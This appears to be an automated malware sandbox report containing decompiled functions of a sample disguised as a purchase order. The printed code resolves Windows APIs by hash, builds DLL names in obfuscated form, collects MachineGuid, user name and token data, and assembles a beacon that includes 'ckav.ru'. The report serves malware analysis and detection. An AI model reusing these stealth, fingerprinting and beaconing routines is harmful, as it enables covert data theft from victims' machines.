                      Uniqueness Score: -1.00%

                      Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 570 404113-404119 559->570 571 40417a 559->571 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 569 4041a9-4041b8 call 403c59 562->569 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 569->576 577 4041db-4041e4 call 402bab 569->577 570->571 575 40411b-404120 570->575 574 40417d-40417e call 403c40 571->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->571 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                      C-Code - Quality: 74%
                      			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                      0x004040c4
                      0x004040ce
                      0x004040d0
                      0x004040e8
                      0x004040ea
                      0x004040ec
                      0x004040f2
                      0x0040418d
                      0x00404190
                      0x00404184
                      0x00000000
                      0x00404184
                      0x004041a0
                      0x004041a5
                      0x004041a7
                      0x00000000
                      0x00000000
                      0x004041a9
                      0x004041b6
                      0x004041b8
                      0x004041be
                      0x004041cb
                      0x004041d0
                      0x004041d1
                      0x004041d3
                      0x004041d8
                      0x004041dc
                      0x00000000
                      0x004041e2
                      0x00404100
                      0x0040410c
                      0x00404111
                      0x0040417a
                      0x0040417a
                      0x00000000
                      0x0040411b
                      0x0040411b
                      0x00404120
                      0x00404122
                      0x00404122
                      0x0040412c
                      0x0040413a
                      0x0040413c
                      0x00404140
                      0x00000000
                      0x00404142
                      0x0040414a
                      0x00404155
                      0x0040415a
                      0x0040415e
                      0x00404168
                      0x00404174
                      0x00404176
                      0x00404176
                      0x0040417d
                      0x0040417e
                      0x00000000
                      0x00404183
                      0x00404140

                      APIs
                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$AllocCreateReadVirtual
                      • String ID: .tmp
                      • API String ID: 3585551309-2986845003
                      • Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                      • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                      • Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                      • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                      Download Yara Rule
                      C-Code - Quality: 79%
                      			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                      0x0041386f
                      0x0041387e
                      0x00413885
                      0x00413889
                      0x0041388c
                      0x00413890
                      0x00413893
                      0x00413897
                      0x0041389a
                      0x0041389e
                      0x004138a1
                      0x004138a5
                      0x004138a8
                      0x004138ac
                      0x004138af
                      0x004138b2
                      0x004138b5
                      0x004138b8
                      0x004138bb
                      0x004138bc
                      0x004138c4
                      0x004138c8
                      0x004138cb
                      0x004138cf
                      0x004138d2
                      0x004138d6
                      0x004138d7
                      0x004138df
                      0x004138e3
                      0x004138e4
                      0x004138ea
                      0x004138eb
                      0x004138f1
                      0x004138f5
                      0x004138f9
                      0x004138fd
                      0x00413901
                      0x00413905
                      0x00413909
                      0x0041390d
                      0x00413911
                      0x00413915
                      0x00413919
                      0x0041391d
                      0x00413921
                      0x00413925
                      0x00413929
                      0x0041392d
                      0x00413931
                      0x00413935
                      0x00413939
                      0x0041393d
                      0x00413941
                      0x00413950
                      0x00413959
                      0x0041395f
                      0x00413968
                      0x0041396e
                      0x00413973
                      0x00413977
                      0x00413979
                      0x00413980
                      0x00413982
                      0x00413991
                      0x0041399c
                      0x0041399e
                      0x004139a4
                      0x004139a9
                      0x004139ac
                      0x004139b1
                      0x004139b1
                      0x004139b2
                      0x004139b7
                      0x004139bc
                      0x004139c1
                      0x004139c7
                      0x004139cd
                      0x004139cd
                      0x004139db

                      APIs
                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                      • GetLastError.KERNEL32 ref: 0041399E
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Error$CreateLastModeMutex
                      • String ID:
                      • API String ID: 3448925889-0
                      • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                      • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                      0x004042cf
                      0x004042d5
                      0x004042df
                      0x004042e2
                      0x004042f9
                      0x004042fb
                      0x00404300
                      0x0040430a
                      0x00404314
                      0x00404319
                      0x00404323
                      0x00404334
                      0x0040433b
                      0x0040433b
                      0x0040433f
                      0x00404344
                      0x0040434c

                      APIs
                      • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                      • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CreatePointerWrite
                      • String ID:
                      • API String ID: 3672724799-0
                      • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                      • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                      • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                      • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                      Download Yara Rule
                      C-Code - Quality: 34%
                      			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}






























                      0x00412d31
                      0x00412d34
                      0x00412d39
                      0x00412d3c
                      0x00412d49
                      0x00412d50
                      0x00412d52
                      0x00412f24
                      0x00412f24
                      0x00412f2b
                      0x00412f30
                      0x00412f32
                      0x00412f37
                      0x00412f41
                      0x00412f53
                      0x00412f53
                      0x00412f5b
                      0x00412f60
                      0x00412d58
                      0x00412d58
                      0x00412d63
                      0x00412d6c
                      0x00412d73
                      0x00412d7e
                      0x00412d7f
                      0x00412d80
                      0x00412d81
                      0x00412d82
                      0x00412d8f
                      0x00412da1
                      0x00412da6
                      0x00412dae
                      0x00412db0
                      0x00412db1
                      0x00412db5
                      0x00412dce
                      0x00412dcf
                      0x00412dd5
                      0x00412dda
                      0x00412db7
                      0x00412db7
                      0x00412db8
                      0x00412dbe
                      0x00412dc4
                      0x00412dc9
                      0x00412dc9
                      0x00412de2
                      0x00412de4
                      0x00412de5
                      0x00412de7
                      0x00412de9
                      0x00412e02
                      0x00412e03
                      0x00412e09
                      0x00412e0e
                      0x00412deb
                      0x00412deb
                      0x00412dec
                      0x00412df2
                      0x00412df8
                      0x00412dfd
                      0x00412dfd
                      0x00412e11
                      0x00412e17
                      0x00412e19
                      0x00412e1a
                      0x00412e1e
                      0x00412e37
                      0x00412e38
                      0x00412e3e
                      0x00412e43
                      0x00412e20
                      0x00412e20
                      0x00412e21
                      0x00412e27
                      0x00412e2d
                      0x00412e32
                      0x00412e32
                      0x00412e4b
                      0x00412e4d
                      0x00412e4f
                      0x00412e7e
                      0x00412e8a
                      0x00412e8f
                      0x00412e51
                      0x00412e59
                      0x00412e67
                      0x00412e6d
                      0x00412e72
                      0x00412e72
                      0x00412e9e
                      0x00412eaf
                      0x00412eb4
                      0x00412ec0
                      0x00412ece
                      0x00412edc
                      0x00412eea
                      0x00412ef8
                      0x00412f0f
                      0x00412f14
                      0x00412f14
                      0x00412f17
                      0x00412f1d
                      0x00412f1f
                      0x00000000
                      0x00412f1f
                      0x00412f74

                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                        • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                        • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                        • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$CreateFreeProcessThread_wmemset
                      • String ID: ckav.ru
                      • API String ID: 2915393847-2696028687
                      • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                      • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                      • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                      • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                      0x00406340
                      0x00406345
                      0x00406373
                      0x00406373
                      0x00406347
                      0x0040634f
                      0x00406354
                      0x00406357
                      0x0040635c
                      0x00406366
                      0x0040636d
                      0x00000000
                      0x00406368
                      0x00406368
                      0x00406368
                      0x00406366
                      0x0040637a

                      APIs
                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      • _wmemset.LIBCMT ref: 0040634F
                        • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser_wmemset
                      • String ID: CA
                      • API String ID: 2078537776-1052703068
                      • Opcode ID: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                      • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                      • Opcode Fuzzy Hash: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                      • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                      0x00406094
                      0x004060a8
                      0x004060ab

                      APIs
                      • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: InformationToken
                      • String ID: IDA
                      • API String ID: 4114910276-365204570
                      • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                      • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                      • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                      • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                      0x00402c10
                      0x00402c15
                      0x00402c1b
                      0x00402c1e

                      APIs
                      • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc
                      • String ID: s1@
                      • API String ID: 190572456-427247929
                      • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                      • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                      • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                      • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}









                      0x00404a56
                      0x00404a65
                      0x00404a6a
                      0x00404ad1
                      0x00404ad1
                      0x00404a6c
                      0x00404a71
                      0x00404a79
                      0x00404a85
                      0x00404a9a
                      0x00404a9e
                      0x00404acb
                      0x00000000
                      0x00404aa0
                      0x00404aac
                      0x00404abc
                      0x00404ac1
                      0x00404ac6
                      0x00404ac6
                      0x00404a9e
                      0x00404ad9

                      APIs
                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                      • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateOpenProcessQueryValue
                      • String ID:
                      • API String ID: 1425999871-0
                      • Opcode ID: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                      • Opcode Fuzzy Hash: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
